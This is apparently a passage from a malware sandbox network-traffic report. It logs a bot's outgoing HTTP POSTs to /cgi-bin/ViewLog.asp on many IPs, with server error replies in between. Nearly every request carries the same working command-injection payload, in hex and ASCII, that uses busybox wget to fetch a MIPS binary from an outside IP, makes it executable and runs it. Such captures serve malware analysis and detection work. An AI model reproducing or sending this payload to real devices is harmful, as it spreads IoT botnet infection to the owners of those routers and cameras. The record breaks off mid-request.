                                              Set-Cookie: oc_sessionPassphrase=P6YY0M%2BMBhdyjhSV7Tblp3KcySP8e8V5hoW%2B%2BX%2FBg2NNLW5susQy3gWk5c9HqVSpoBmTHxQcJNNHRAQUEtIac%2BmolHMt2%2FIMyQTB9UT%2FSfVNNO25DQAXB79Qga66R4ME; path=/; secure; HttpOnly; SameSite=Lax
                                              Set-Cookie: ocnzsv36w8oq=b2176960f6956beed1f101d16ab93b0f; path=/; secure; HttpOnly; SameSite=Lax
                                              Set-Cookie: ocnzsv36w8oq=b2176960f6956beed1f101d16ab93b0f; path=/; secure; HttpOnly; SameSite=Lax
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-QzJFUVVwYlBrTVBxVksxNHQ2WEc3dzQ3Z2FNaEYwU2VMRUg0YVo3bzY5bz06V3lwYU51T1hxSm5aTU10QnhOS0tybjloNk1Sc1ZBUHpRM1hNQmZ2YXI0QT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              215192.168.2.145806494.122.112.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.849452019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              216192.168.2.143286462.29.126.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.849637985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              217192.168.2.145818894.122.85.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.853862047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              218192.168.2.144135294.46.184.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.993573904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.165293932 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:11:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              219192.168.2.145958862.78.37.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.026484966 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              220192.168.2.145464462.167.59.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.077920914 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.307917118 CET487INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:50:15 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              221192.168.2.143741294.120.27.1348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.080651999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              222192.168.2.145270494.120.48.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.091186047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              223192.168.2.143629862.29.98.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.855070114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              224192.168.2.143683894.121.25.1858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.855180025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              225192.168.2.143601831.200.117.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.862195969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              226192.168.2.143794885.237.89.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.254929066 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:04.425383091 CET360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:16:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              227192.168.2.143929094.122.195.2458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.488989115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              228192.168.2.143824294.103.198.2338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.897361040 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.083322048 CET165INHTTP/1.0 403 Access denied
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              229192.168.2.144737694.110.167.418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.909460068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              230192.168.2.144775262.29.115.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.939276934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              231192.168.2.143824894.103.198.2338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:05.266249895 CET165INHTTP/1.0 403 Access denied
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              232192.168.2.144209494.121.158.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.421221972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
